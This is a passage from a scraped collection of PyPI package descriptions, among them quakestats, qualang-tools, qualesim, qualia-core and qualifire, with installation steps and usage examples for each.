Nothing more at the moment.# you need to run the command in proper python environment# use \"quakestats status\" to check your environmentquakestatsset-admin-pwdCollecting Quake Live statsQuake Live exposes stats server through tcp socket (zmq) authenticated with password.\nCLI can gather stats from multiple QL servers and process them automatically.\nUse following config file[server-1]ip=5.6.7.8port=27967password=password1[server-1]ip=1.2.3.4port=27967password=password2Use following CLI to start collecting events (assuming your config file is namedcollector.cfg)quakestatscollect-qlcollector.cfgUploading Quake 3 log fileIn order to process some data you need to send your match log file to web api endpoint/api/v2/upload. By default modospis assumed.\nMod specific endpoint is served under/api/v2/upload/, e.g./api/v2/upload/edawnYou need anADMIN_TOKENset in configuration.curl-XPOST--formfile=@/path/to/your/games.log--formtoken=adminsecrettokenhost:port/api/v2/uploadAll log files with extracted matches are stored in directory determined byRAW_DATA_DIRconfig entryUsing automated script to send logsTODO, deprecatedRebuilding databaseYou can rebuild your database using files stored inRAW_DATA_DIRwith simple web api call or CLI.curl-XPOSThost:port/api/v2/admin/rebuild--formtoken=adminsecrettoken# you need to run the command in proper python environment# use \"quakestats status\" to check your environmentquakestatsrebuild-dbIf you implement some new Medals or any other backend related feature this API call will clear previous data stored in DB and process all matches from data directory once again.Merging player resultsUnfortunately the only way to distinguish players in Quake 3 servers is to use player nickname. When player changes his nickname between matches he will be treated as new unique player. In such cases admin can merge results of two specific players. Use with caution as it will rewrite history of all matches stored in database.curl-XPOSThost:port/api/v2/admin/players/merge--formtoken=admintoken--formsource_player_id=297f6272f79d4918c4efe098--formtarget_player_id=df55e5cd4582d6f14cd20746It will merge all results from player with id297f6272f79d4918c4efe098into player with iddf55e5cd4582d6f14cd20746. To find out how player ID is build see the development section.Importing preprocessed match logPreprocessed match logs stored inRAW_DATA_DIRcan be imported using admin match import API.\nThis can be particularly useful when e.g. debugging some bugs on dev infra.curl-XPOST--formfile=@bugmatch.log--formtoken=admintokenhost:port/api/v2/admin/match/importDevelopmentTech stackPython, Flask, MongoDB, d3.js, riot.js, zmqHow does it work with Quake 3 PlayersQuake 3 players don't have unique ID's so it's hard to distinguish players between matches. In order to overcome this problem each player hasplayer_idassigned during match analysis. The ID is constructed as hash ofSERVER_DOMAINand player nickname as a result it's consistent between matches as long as player keeps his nickname and there is no nickname clash. Perhaps there is some better way? 
Server side auth?WebWeb application related componentsapi - web API used by frontend and to retrieve Quake 3 logsviews - typical flask viewsExtendingHow to add new medalseeSpecialScores class- for special scoresseeBadger class- for badges calculationseeJS resources- to add new medal imageRunning testsmaketestAssetsMedals, icons, etc.\nSome of the assets are missing it would be nice to find some free ones or draw them ;)How to release new versionbumpversion--commit--tag"} +{"package": "quala", "pacakge-description": "qualaQuala implements different accelerators for optimization\nsolvers, root finders and fixed-point methods, such as Broyden-type quasi-Newton\nmethods and Anderson acceleration.The algorithms are implemented in C++, and are available through a Python\ninterface.InstallationThe Python interface can be installed fromPyPIusingpip:python3-mpipinstallqualaInstallation instructions for the C++ library can be found in thedocumentation.Examples and documentationPython Documentation (Sphinx)C++ Documentation (Doxygen)Python Examples (Sphinx)C++ Examples (Doxygen)"} +{"package": "qualang-tools", "pacakge-description": "QUA Language ToolsThe QUA language tools package includes various tools useful while writing QUA programs and performing experiments.It includes:QUA Loops Tools- This library includes tools for parametrizing QUA for_ loops using the numpy (linspace, arange, logspace) methods or by directly inputting a numpy array.Plotting Tools- This library includes tools to help handling plots from QUA programs.Result Tools- This library includes tools for handling and fetching results from QUA programs.Units Tools- This library includes tools for using units (MHz, us, mV...) and converting data to other units (demodulated data to volts for instance).Analysis Tools- This library includes tools for analyzing data from experiments.\nIt currently has a two-states discriminator for analyzing the ground and excited IQ blobs.Multi-user tools- This library includes tools for working with the QOP in a multi-user or multi-process setting.Bakery- This library introduces a new framework for creating arbitrary waveforms and\nstoring them in the usual configuration file. It allows defining waveforms in a QUA-like manner while working with 1ns resolution (or higher).External Frameworks- This library introduces drivers for integrating the OPX within external frameworks such as QCoDeS. Please refer to theexamplessection for more details about how to use these drivers.Addons:Calibrations- This module allows to easily perform most of the standard single qubit calibrations from a single python file.Interactive Plot Library- This package drastically extends the capabilities of matplotlib,\nenables easily editing various parts of the figure, copy-pasting data between figures and into spreadsheets,\nfitting the data and saving the figures.assign_variables_to_element- Forces the given variables to be used by the given element thread. 
Useful as a workaround for when the compiler\nwrongly assigns variables which can cause gaps.Config Tools- This package includes tools related to the QOP configuration file, including:Integration Weights Tools- This package includes tools for the creation and manipulation of integration weights.Waveform Tools- This package includes tools for creating waveforms useful for experiments with the QOP.Config Helper Tools- This package includes tools for writing and updating the configuration.Config GUI- This package contains a GUI for creating and visualizing the configuration file - No longer being actively developed.Config Builder- This package contains an API for creating and manipulation configuration files - No longer being actively developed.Control Panel- This package includes tools for directly controlling the OPX.ManualOutputControl- This module allows controlling the outputs from the OPX in CW mode. Once created, it has an API for defining which channels are on. Analog channels also have an API for defining their amplitude and frequency.VNA- This module allows to configure the OPX as a VNA for a given element (readout resonator for instance) and operation (readout pulse for instance) already defined in the configuration. Once created, it has an API for defining which measurements are to be run depending on the down-conversion solution used (ED: envelope detector, IR: image rejection mixer, IQ: IQ mixer).InstallationInstall the current version usingpip, the--upgradeflag ensures that you will get the latest version.pipinstall--upgradequalang-toolsNote that in order use theConfig GUIorConfig Builder, you need to install usingpipinstall--upgradequalang-tools[configbuilder]Note that in order use theInteractive Plot Library, you need to install usingpipinstall--upgradequalang-tools[interplot]Support and ContributionHave an idea for another tool? A way to improve an existing one? Found a bug in our code?We'll be happy if you could let us know by opening anissueon theGitHub repository.Feel like contributing code to this library? We're thrilled! Please followthis guideand feel free to contact us if you need any help, you can do it by opening anissue:)UsageExamples for using various tools can be found on theQUA Libraries Repository.Examples for using the Baking toolbox, including 1-qubit randomized benchmarking, cross-entropy benchmark (XEB), high sampling rate baking and more can be foundhere."} +{"package": "qualdocs", "pacakge-description": "A python library for supporting open qualitative coding of text data in Google Docs comments. Integrates with the Google Docs API via PyDrive to create pandas dataframes for each code/tag and the highlighted text in a set of documents."} +{"package": "qualesim", "pacakge-description": "StartThe QuaLeSim(Quantum Lego Simulator) is an adapted version of DQCSim. For quantum circuit simulation, you can simulate QUIET-s and QCIS instruction by it.\nAnd what's more, now the QuaLeSim is integrated into the backend of Quingo, you can use it directly after installing quingoc and quingo-runtime. 
More inforemations is available in [[#Install]]InstallThe QuaLeSim now is only for Linux platform.\u73af\u5883\u51c6\u5907\uff1aLinux platform withpython>=3.6Rust # if you don't have rust, make sure you have'curl'to install rust in the setup.py .\u5b89\u88c5\u8bf4\u660e\uff1aYou can get the source code from giteegit clone git@gitee.com:quingo/qualesim.git\n cd qualesim\n git checkout task/fix-bugs\n git submodule update --init --recursive \n # you must have the limits of authority of quiet-parser, dqcsim-qcis, \n # dqcsim-quiets, dqcsim-tequila, dqcsim-quantumsim.\n pip install -r requirements.txt\n pip install . # the step may be very slow, you can use command below.\n \t\t\t # python setup.py bdist_wheel\n \t\t\t # cd /target/python/build/bdist.linux-x86_64/wheel\n \t\t\t # pip install xxx.whl\n \t\t\t # \u5b58\u5728LLVM\u7684\u60c5\u51b5\u4e0b\u4f1a\u5f88\u6162\uff0c\u6682\u65f6\u4e0d\u6e05\u695a\u539f\u56e0\uff0c\u6b63\u5728\u4fee\u6539\u4e2d\u3002externs:# The Simulator is for QCIS and QUIET-s, and now the quingo-0.2.3 can generate QCIS \n and QUIET-s\n # so you can install quingoc and quingo-runtime to use it.\n # quingoc:\n git clone git@gitee.com:quingo/quingo-compiler.git\n git checkout enh/I7U2U5/refactor_frontend\n\n 1. add eigen \n \tmkdir \n \tcd \n \tcp /mnt/share/eigen-3.4.0.zip .\n \tunzip eigen-3.4.0.zip\n \t\n \t# then copy Eigen and unsupported to quingo-compiler/extern and like \n \t- `quingo-compiler/extern/Eigen/src/SparseCholesky/SimplicialCholesky.h`\n \t\t- SimplicialCholesky& setMode(SimplicialCholeskyMode mode)(around line 545):\n \t\t{\n \t\t switch(mode)\n \t\t {\n \t\t case SimplicialCholeskyLLT:\n \t\t m_LDLT = false;\n \t\t break;\n \t\t case SimplicialCholeskyLDLT:\n \t\t m_LDLT = true;\n \t\t break;\n \t\t default: // delete this line\n \t\t break; // delete this line\n \t\t }\n \t\t}\n \t- `quingo-compiler/extern/unsupported/Eigen/MatrixFunctions`\n 2. cd quingo-compiler/build\n 3. cmakeninja ..\n 4. ninja\n 5. ln -s /build/bin/quingoc ~/.local/bin/quingoc # \u5efa\u7acb\u8f6f\u94fe\u63a5\n\n # quingo-runtime and other simulators:\n git clone git@gitee.com:quingo/quingo-runtime.git\n cd quingo-runtime\n git checkout task/backend-result\n pip install -e .\n\n git clone git@gitee.com:quingo/pyqcisim.git\n cd pyqcisim\n git checkout bug-fix\n pip install -e .\n\n git clone git@gitee.com:quingo/SymQC.git\n cd SymQC\n pip install -e .\n ``` ^dea5d0Quick StartQuick Start is for users use the Simulator directly or use it with quingo-runtime. 
Some examples are available below.For independent users:The Simulator can simulate QUIET-s and QCIS instructions, you can use it directly:fromdqcsim.pluginimport*fromdqcsim.hostimport*sim=Simulator(stderr_verbosity=Loglevel.INFO)sim.with_frontend(\"\",verbosity=Loglevel.INFO)# sim.with_frontend(\"\", verbosity=Loglevel.INFO)# Loglevel is for output information for DEBUG/INFO/OFF# If you only want the simulation output, please set it OFFsim.with_backend(\"quantumsim\",verbosity=Loglevel.INFO)# sim.with_backend(\"tequila\", verbosity=Loglevel.INFO)# now we have DQCsim-Tequila and DQCsim-QuantumSim backend for Simulatorsim.simulate()res=sim.run(measure_mod=\"state_vector\",num_shots=10)# Start the simulation with different exe mod,# measure_mod=\"one_shot\" and num_shots=int /# \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \"state_vector\"# the output should besim.stop()final_state=dict()final_state=res[\"res\"]print(final_state)the output is :measure_mod=\"state_vector\":res1(MQ1,MQ2)={'classical':{'Q1':1,'Q2':1},'quantum':(['Q3'],[0j,(1+0j)])}# classical is qubit measured, quantum is qubit unmeasured with state vector.res2()={'classical':{},'quantum':(['Q1','Q2','Q3'],[(0.7071067811865472+0j),0j,0j,0j,0j,0j,0j,(0.7071067811865478+0j)])}measure_mod=\"one_shot\",num_shots=10:# classical is classical value, quantum is qubit measured. and they are one to one correspondenceres(measure(q1)->c1,measure(q2)->c2)={'quantum':[['q1','q2'],[[0,0],[0,0],[1,1],[0,0],[0,0],[1,1],[0,0],[0,0],[1,1],[1,1]]],'classical':[{'c1':[0],'c2':[0]},{'c1':[0],'c2':[0]},{'c1':[1],'c2':[1]},{'c1':[0],'c2':[0]},{'c1':[0],'c2':[0]},{'c1':[1],'c2':[1]},{'c1':[0],'c2':[0]},{'c1':[0],'c2':[0]},{'c1':[1],'c2':[1]},{'c1':[1],'c2':[1]}]}For Quingo UsersYou should follow the [[#Install|extern: quingoc & quingo-runtime installation]] to install it.fromquingoimport*importqututor.global_configasgcfromquingo.backend.qisaimportQisa# input quingo file and simulate qu funcqu_file=gc.quingo_dir/\"ghz.qu\"circ_name=\"GHZ_state\"# set the qisa, and it is the output instructions QUIET,# you can change to Qisa.QCIS or others.task=Quingo_task(qu_file,circ_name,qisa=Qisa.QUIET,)num_shots=10cfg=ExeConfig(ExeMode.SimFinalResult,num_shots)num_qubits=3# now backend BackendType.QUANTUM_SIM, BackendType.DQCSIM_TEQUILA# BackendType.DQCSIM_QUANTUMSIM, BackendType.SYMQC is available.# method 1qasm_fn=compile(task,params=(num_qubits,))res=execute(qasm_fn,BackendType.QUANTUM_SIM,cfg)# method 2# res = call(task, (num_qubits,), BackendType.DQCSIM_TEQUILA, cfg)print(\"res: \",res)the output is :measure_mod=\"state_vector\":res1(MQ1,MQ2)={'classical':{'Q1':1,'Q2':1},'quantum':(['Q3'],[0j,(1+0j)])}# classical is qubit measured, quantum is qubit unmeasured with state vector.res2()={'classical':{},'quantum':(['Q1','Q2','Q3'],[(0.7071067811865472+0j),0j,0j,0j,0j,0j,0j,(0.7071067811865478+0j)])}measure_mod=\"one_shot\",num_shots=10:# quingo-runtime only have quantum values.res(measure(q1)->c1,measure(q2)->c2)=(['q1','q2'],[[0,0],[0,0],[1,1],[0,0],[0,0],[1,1],[0,0],[0,0],[1,1],[1,1]])FAQfor installyour environment donot have rust?you can install rust yourself by theRust \u7a0b\u5e8f\u8bbe\u8ba1\u8bed\u8a00 (rust-lang.org)or just make sure you have command\"curl\", the setup will help you install it automatic.if you have llvm in your platform, the setup install maybe very slow.the problem is to be solved.install about quingocplease refer todocs/DeveloperGuide.md \u00b7 Quingo/quingo-compiler - Gitee.comfor usewhen you first use it, there would be a 
problem\u6838\u5fc3\u5df2\u8f6c\u50a8it is the dqcsim's problem and is to be solved."} +{"package": "qualesim-qcis", "pacakge-description": "No description available on PyPI."} +{"package": "qualesim-quantumsim", "pacakge-description": "QuaLeSim backend for Quantumsim.It is an adapted version of DQCSim-quantumsim."} +{"package": "qualesim-quiets", "pacakge-description": "DQCSim-Quiets\u4ecb\u7ecd\u672c\u524d\u7aef\u4e3aQuaLeSim-QUIETS\u524d\u7aef\uff0c\u4e3aQuaLeSim\u6846\u67b6\u63d0\u4f9b\u4e86\u4e00\u4e2a\u53ef\u4ee5\u8bc6\u522bQUIET-S\u91cf\u5b50-\u7ecf\u5178\u6df7\u5408\u6307\u4ee4\u96c6\u7684\u524d\u7aef\u63d2\u4ef6\u3002\u5b89\u88c5\u6559\u7a0b\u4e0eQuaLeSim\u534f\u540c\u5b89\u88c5pip install qualesim[PLUGINS]"} +{"package": "qualg", "pacakge-description": "QuAlg (0.1.0)Welcome to QuAlg's README.DocumentationFull documentation can be foundhere.\nThe best way to get started is to have a look at thequickstart-guide.\nThe actual jupyter notebook of the quickstart-guide can be foundhere.InstallationTo install the package do:makeinstallTo verify the installation do:make verify"} +{"package": "qualia", "pacakge-description": "(c) Copyright Afshin T. Darian 2019. All Rights Reserved."} +{"package": "qualia-codegen-core", "pacakge-description": "Copyright 2021 (c) Pierre-Emmanuel Novacpenovac@unice.frUniversit\u00e9 C\u00f4te d'Azur, CNRS, LEAT. All rights reserved.Qualia-CodeGen-CoreConverts a pre-trained Keras .h5 or PyTorch model to C code for inference.Generated C code useschannels_lastdata format.Supported layersActivation: ReLU (combined to previous Conv1D, Dense, MaxPooling1D, AveragePooling1D AddV2), SoftmaxConv1D: optional bias, valid padding onlyDense: optional biasMaxPooling1D: valid padding onlyAveragePooling1D: valid padding onlyFlatten: implies reordering next layer's kernel for data format conversionZeroPadding1D: combined with next Conv1DAddV2Dependenciespython >= 3.9Python:jinja2\nnumpyKerasPython:tensorflow >= 2.6.0\nkeras >= 2.6.0PyTorchPython:torch >= 1.8.0Installationpip install -e .UsageGenerate C code from Keras .h5qualia_codegen Use in your C codeInclude the model: (can also be built as a separate object)#include \"model.h\"Allocateinputsandoutputsarrays with correct dimensions. Remember thatinputsmust havechannels_lastdata format.Call it in your C code:cnn(inputs, outputs);Add the source filemodel.cto your build system. It includes all the other source files for layers, don't add these to the build system.ExamplesSee thesrc/qualia_codegen_core/examples/Linuxdirectory for a demo console application to evaluate model accuracy.src/qualia_codegen_core/examples/qualia_codegen-NucleoL476RGcontains an STM32CubeIDE project for the Nucleo-L476RG board that's currently broken due to some recent changesDocumentationNothing much\u2026Source treesrc/qualia_codegen_core/Allocator.py: manages activation buffer allocation. Tries to group all buffers into one, except when they cannot be overwritten (dependencies).src/qualia_codegen_core/Converter.py: the actual conversion code, parses a Keras model and use the template file associated to each layer to generate C code. When weights have to be written, they are optionally quantized to fixed-point by setting the appropriate parameters ofConverterconstructor (see its definition)src/qualia_codegen_core/Validator.py: work in progress, should contain functions to check if a model can be successfully converted. 
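A minimal host-side caller, assembled from the calling sequence described above, might look like the following sketch. Only the model.h include, the channels_last inputs/outputs arrays and the cnn(inputs, outputs) call come from this package's description; the 128x3 input window, the 5-class output and the float element type are illustrative assumptions and have to be replaced by the dimensions and types found in the generated model.h.

#include <stdio.h>
#include "model.h"               /* header generated by qualia_codegen */

/* Assumed shapes for illustration only: 128 samples x 3 channels in, 5 classes out. */
static float inputs[128][3];     /* channels_last: [samples][channels] */
static float outputs[5];

int main(void)
{
    /* ... fill inputs[][] with one window of input data here ... */
    cnn(inputs, outputs);        /* single inference call as described above */
    for (int i = 0; i < 5; i++)
        printf("class %d: %f\n", i, (double)outputs[i]);
    return 0;
}

Since model.c pulls in the layer sources itself, compiling a caller like this together with the generated model.c should be enough for a quick on-host check before moving to one of the embedded example projects.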
For now only check activation function.src/qualia_codegen_core/assets/: contains the templates to generate C inference codesrc/qualia_codegen_core/assets/layers/: contains the implementation of the various supported layerssrc/qualia_codegen_core/assets/layers/weights: contains the support for the trainable layers weights"} +{"package": "qualia-codegen-plugin-snn", "pacakge-description": "Copyright 2021 (c) Pierre-Emmanuel Novacpenovac@unice.frUniversit\u00e9 C\u00f4te d'Azur, CNRS, LEAT. All rights reserved.Qualia-CodeGen-Plugin-SNN"} +{"package": "qualia-core", "pacakge-description": "Qualia Core (formerly MicroAI)End-to-end training, quantization and deployment framework for deep neural networks on microcontrollers.Repository should be cloned with--recursiveto get TFLite Micro and its dependencies.DependenciesPython:numpy\nscikit-learn\ntomlkit\ncolorful\ngitpythonDatasetGTSRBPython:imageio\nscikit-imageTrainingTensorFlowPython:tensorflow\ntensorflow_addonsPyTorchPython:pytorch\npytorch_lightningDeploymentEmbedded targetsSparkFun EdgePython:pycryptodomeNucleo-L452RE-PSystem:stm32cubeide\nstm32cubeprogEmbedded frameworksSTM32Cube.AISTM32CubeIDE extension pack:X-CUBE-AI == 5.2.0TensorFlow Lite MicroSystem:arm-none-eabi-binutils\narm-none-eabi-gcc\narm-none-eabi-newlib\nlibopenexr-dev\nwgetQualia-CodeGenPython:jinja2System:arm-none-eabi-binutils\narm-none-eabi-gcc\narm-none-eabi-newlibEvaluationPython:pyserialUsageIf Qualia installed with pip, you can run thequaliacommand directly. Otherwise runPYTHONPATH=. ./bin/qualia from the qualia directory.Dataset pre-processingqualia preprocess_dataTrainingqualia trainPrepare deployment (generate firmware)qualia prepare_deployDeploy and evaluatequalia deploy_and_evaluateRun test suiteCUBLAS_WORKSPACE_CONFIG=:4096:8 PYTHONHASHSEED=2 python -m unittest discover qualia/testsIncluded support for datasets, learning framework, neural networks, embedded frameworks and targetsDatasetsUCI HARGTSRBWritten and Spoken MNISTLearning frameworksTensorFlow.KerasPyTorchNeural networksMLPCNN (1D&2D)Resnetv1 (1D&2D)Embedded frameworksSTM32Cube.AITensorFlow Lite for MicrocontrollersQualia-CodeGenTargetsNucleo-L452RE-PSparkFun EdgeReference & CitationQuantization and Deployment of Deep Neural Networks on Microcontrollers, Pierre-Emmanuel Novac, Ghouthi Boukli Hacene, Alain Pegatoquet, Beno\u00eet Miramond and Vincent Gripon, Sensors, 2021.@article{qualia,\n\tauthor = {Novac, Pierre-Emmanuel and Boukli Hacene, Ghouthi and Pegatoquet, Alain and Miramond, Beno\u00eet and Gripon, Vincent},\n\ttitle = {Quantization and Deployment of Deep Neural Networks on Microcontrollers},\n\tjournal = {Sensors},\n\tvolume = {21},\n\tyear = {2021},\n\tnumber = {9},\n\tarticle-number = {2984},\n\turl = {https://www.mdpi.com/1424-8220/21/9/2984},\n\tissn = {1424-8220},\n\tdoi = {10.3390/s21092984}\n}"} +{"package": "qualia-plugin-snn", "pacakge-description": "Qualia-Plugin-SNNCopyright 2023 \u00a9 Pierre-Emmanuel Novacpenovac@unice.frUniversit\u00e9 C\u00f4te d'Azur, LEAT. 
All rights reserved.Plugin for Spiking Neural Network support inside Qualia.Installgit clone https://github.com/LEAT-EDGE/qualia-plugin-snn.git\ncd qualia-plugin-snn\npdm venv create\npdm use \"$(pwd)/.venv/bin/python\"\n$(pdm venv activate in-project)\npdm install -G gsc -G codegenRun CIFAR-10 SVGG16 exampleDownloadCIFAR-10 python versionand extract it insidedata/.qualia conf/cifar10/vgg16_bn_ifsr_float32_train.toml preprocess_data\nqualia conf/cifar10/vgg16_bn_ifsr_float32_train.toml train\nqualia conf/cifar10/vgg16_bn_ifsr_float32_train.toml prepare_deploy\nqualia conf/cifar10/vgg16_bn_ifsr_float32_train.toml deploy_and_evaluateAcknowledgmentSpikingJelly[^1][^1]: Please note article V.1 \"Disclosure of Commercial Use\" of theOpen-Intelligence Open Source License V1.0"} +{"package": "qualia-plugin-template", "pacakge-description": "Qualia-Plugin-TemplateCopyright 2023 \u00a9 Pierre-Emmanuel Novacpenovac@unice.frUniversit\u00e9 C\u00f4te d'Azur, LEAT. All rights reserved.Template plugin for Qualia.How to create a plugin from the templateInstall QualiaInstall Qualia with the developer setup using PDM by following theInstallation guide.Install Qualia-Plugin-TemplateMove into the base Qualia folder, then clone the Qualia-Plugin-Template repository:git clone ssh://git@naixtech.unice.fr:2204/qualia/qualia-plugin-template.gitIf you do not have an SSH key registered in Gitlab, use the HTTPS URL instead:git clone https://naixtech.unice.fr/gitlab/qualia/qualia-plugin-template.gitThen install it:pdm add -e ./qualia-plugin-template --devCreate a new Git repository for your pluginIn the Gitlab web interface of theQualia group,\ncreate a new repository by clicking theNew projectbutton. SelectCreate blank project.SetQualia-Plugin-as the project name, withreplaced by the name of your plugin.Select the appropriate visibility levelUncheckInitialize repository with a README.Finally, clickCreate project.Generate a plugin project from the templateMove into the base Qualia folder, then generate the plugin project:pdm run qualia-create-plugin should be replaced by the name of your plugin (without thequalia-plugin-prefix).Then, follow the questions asked to provide the author's name and email address, the homepage and git repository of the plugin.For more information about the structure of the created plugin project,\nseeRepository structure.Push the new plugin to the git repositoryMove into the newly created plugin's folder:cd qualia-plugin-Then push the new content to the repository:git push -u origin masterEdit the plugin dependenciesEdit thepyproject.tomlfile to fill the dependencies required by your plugin,\nin particular any other required Qualia plugin.\nYou can choose between mandatory or optional dependencies.\nAny item inside angle brackets<>must be replaced by a value of your choice.Mandatory dependencies[project]\ndependencies = [\n '',\n '<\u2026>',\n '',\n]Optional dependency groups[project.optional-dependencies]\n = ['', '<\u2026>', '']\n<\u2026>\n = ['', '<\u2026>', '']EditREADME.mdEdit theREADME.mdfile to provide the description of your plugin, a short user guide and any information that the user must know about to use your plugin.Install the plugin and its dependenciesMove into the base Qualia folder, then install your plugin:Then install it:pdm add -e ./qualia-plugin-[,] --devwiththe name of your plugin and,optional dependency groups.Edit documentation builder configurationIf the documentation of the plugin needs to cross-reference external Python modules, add the link to the documentation in 
the InterSphinx mapping of thedocs/conf.pyfile.\nAny item inside angle brackets<>must be replaced by a value of your choice.intersphinx_mapping = {\n '': ('', None),\n}Provide the Python source files of your moduleAdd any source file for your module under one of Qualia's package in thesrc/qualia_plugin_/folder.Dummy modules for the dataset, learningmodel.pytorch, postprocessing and preprocessing are supplied in the template to illustrate adding new modules for these packages.\nA learningframework override for PyTorch is provided to illustrate overriding an existing module, and, in this case, import the supplied Dummy learningmodel for use with PyTorch.\nThese Dummy modules must be removed before publishing you plugin, unnecessary packages should also be removed.For more information about the various Qualia packages, seePython package structure.\nFor more information about how the plugin's packages are loaded, seePlugin architecture.Provide example configuration filesAdd example configuration files in theconf/directory to demonstrate the usage of your plugin.All configuration files must load the plugin:[bench]\nplugins = ['qualia_plugin_']A Dummy configuration is provided in the template to load the provided Dummy modules. The Dummy configuration must be removed before publishing your plugin.For more information about configuration files, see:Configuration fileProvide documentationAdd any API documentation as docstrings in your source files.Add any high-level documentation pages in thedocs/directory and reference them in the documentation homepage filedocs/index.rst.For more information about writing documentation, see:Writing documentation.Provide tests for your plugin modulesAdd any automatic testing modules that use the PyTest framework in thetests/directory.For more information about tests, see:Tests"} +{"package": "qualichat", "pacakge-description": "Open-source linguistic ethnography tool for framing public opinion in mediatized groups.Table of ContentsInstallingQuickstartLinksInstallingPython 3.7.1 or higher is required.To install the library, you can just run the following command:$pipinstall-UqualichatTo install a development version, follow these steps:$gitclonehttps://github.com/qualichat/qualichat\n$cdqualichat# Linux/MacOS$python3-mpipinstall-U.# Windows$py-3-mpipinstall-U.QuickstartTo use this library, you need a plain chat text file, following this format:[dd/mm/yy hh:mm:ss] : For example, see this following sample chat file namedsample-chat.txt:[01/01/21 07:52:45] Joel: Hello!\n[01/01/21 07:52:47] Mary: Hi!\n[01/01/21 07:52:49] Joel: How are you guys?\n[01/01/21 07:52:52] Mary: We are fine! \u00f0\u0178\u02dc\u0160\nHow about you?\n[01/01/21 07:52:55] Oliva: Everything's great!\n[01/01/21 07:52:59] Joel: Cool! 
I am also fine!\n[01/01/21 07:53:03] John leftIn your code, you will just load the chat usingqualichat.load_chat().chat=qualichat.load_chat('sample-chat.txt')LinksWebsite:http://qualichat.comDocumentation:https://qualichat.readthedocs.ioSource code:https://github.com/qualichat/qualichat"} +{"package": "qualichat-qualitube", "pacakge-description": "No description available on PyPI."} +{"package": "qualif", "pacakge-description": "MIT LicenseCopyright (c) 2021 diffuserPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qualified", "pacakge-description": "No description available on PyPI."} +{"package": "qualified-name-extractor", "pacakge-description": "extract qualified name"} +{"package": "qualifier", "pacakge-description": "qualifierBuild StatusTraivs:Circleci:Description:A simple python project used for updating the qualifier part of the version for python projects.Expectation:This project expects setup.py of this formatfromsetuptoolsimportsetup__QUALIFIER__=\"\"setup(name=\"qualifier\",version=\"1.0.0\"+__QUALIFIER__,...)On running the commandupdate_qualifierwhich is provided on installing this project as shell command,__QUALIFIER__would be update based the rules.Rules:If the HEAD is tagged and the branch is master then__QUALIFIER__will not be updatedIf the HEAD is not tagged and the branch is master then__QUALIFIER__will be updated torcIf the HEAD is not tagged and the branch is not master then__QUALIFIER__will be updated to.dev"} +{"package": "qualifire", "pacakge-description": "qualifireQualifire Python SDKVery first stepsInitialize your codeInitializegitinside your repo:cdqualifire&&gitinitIf you don't havePoetryinstalled run:makepoetry-downloadInitialize poetry and installpre-commithooks:makeinstall\nmakepre-commit-installRun the codestyle:makecodestyleUpload initial code to GitHub:gitadd.\ngitcommit-m\":tada: Initial commit\"gitbranch-Mmain\ngitremoteaddoriginhttps://github.com/qualifire-dev/qualifire.git\ngitpush-uoriginmainSet up botsSet upDependabotto ensure you have the latest dependencies.Set upStale botfor automatic issue closing.PoetryWant to know more about Poetry? Checkits documentation.Details about PoetryPoetry'scommandsare very intuitive and easy to learn, like:poetry add numpy@latestpoetry run pytestpoetry publish --buildetcBuilding and releasing your packageBuilding a new version of the application contains steps:Bump the version of your packagepoetry version . You can pass the new version explicitly, or a rule such asmajor,minor, orpatch. 
For more details, refer to theSemantic Versionsstandard.Make a commit toGitHub.Create aGitHub release.And... publish \ud83d\ude42poetry publish --build\ud83c\udfaf What's nextWell, that's up to you \ud83d\udcaa\ud83c\udffb. I can only recommend the packages and articles that helped me.Typeris great for creating CLI applications.Richmakes it easy to add beautiful formatting in the terminal.Pydantic\u2013 data validation and settings management using Python type hinting.Logurumakes logging (stupidly) simple.tqdm\u2013 fast, extensible progress bar for Python and CLI.IceCreamis a little library for sweet and creamy debugging.orjson\u2013 ultra fast JSON parsing library.Returnsmakes you function's output meaningful, typed, and safe!Hydrais a framework for elegantly configuring complex applications.FastAPIis a type-driven asynchronous web framework.Articles:Open Source Guides.A handy guide to financial support for open sourceGitHub Actions Documentation.Maybe you would like to addgitmojito commit names. This is really funny. \ud83d\ude04\ud83d\ude80 FeaturesDevelopment featuresSupports forPython 3.8and higher.Poetryas the dependencies manager. See configuration inpyproject.tomlandsetup.cfg.Automatic codestyle withblack,isortandpyupgrade.Ready-to-usepre-commithooks with code-formatting.Type checks withmypy; docstring checks withdarglint; security checks withsafetyandbanditTesting withpytest.Ready-to-use.editorconfig,.dockerignore, and.gitignore. You don't have to worry about those things.Deployment featuresGitHubintegration: issue and pr templates.Github Actionswith predefinedbuild workflowas the default CI/CD.Everything is already set up for security checks, codestyle checks, code formatting, testing, linting, docker builds, etc withMakefile. More details inmakefile-usage.Dockerfilefor your package.Always up-to-date dependencies with@dependabot. You will onlyenable it.Automatic drafts of new releases withRelease Drafter. You may see the list of labels inrelease-drafter.yml. Works perfectly withSemantic Versionsspecification.Open source community featuresReady-to-usePull Requests templatesand severalIssue templates.Files such as:LICENSE,CONTRIBUTING.md,CODE_OF_CONDUCT.md, andSECURITY.mdare generated automatically.Stale botthat closes abandoned issues after a period of inactivity. (You will onlyneed to setup free plan). Configuration ishere.Semantic Versionsspecification withRelease Drafter.Installationpipinstall-Uqualifireor install withPoetrypoetryaddqualifireMakefile usageMakefilecontains a lot of functions for faster development.1. Download and remove PoetryTo download and install Poetry run:makepoetry-downloadTo uninstallmakepoetry-remove2. Install all dependencies and pre-commit hooksInstall requirements:makeinstallPre-commit hooks coulb be installed aftergit initviamakepre-commit-install3. CodestyleAutomatic formatting usespyupgrade,isortandblack.makecodestyle# or use synonymmakeformattingCodestyle checks only, without rewriting 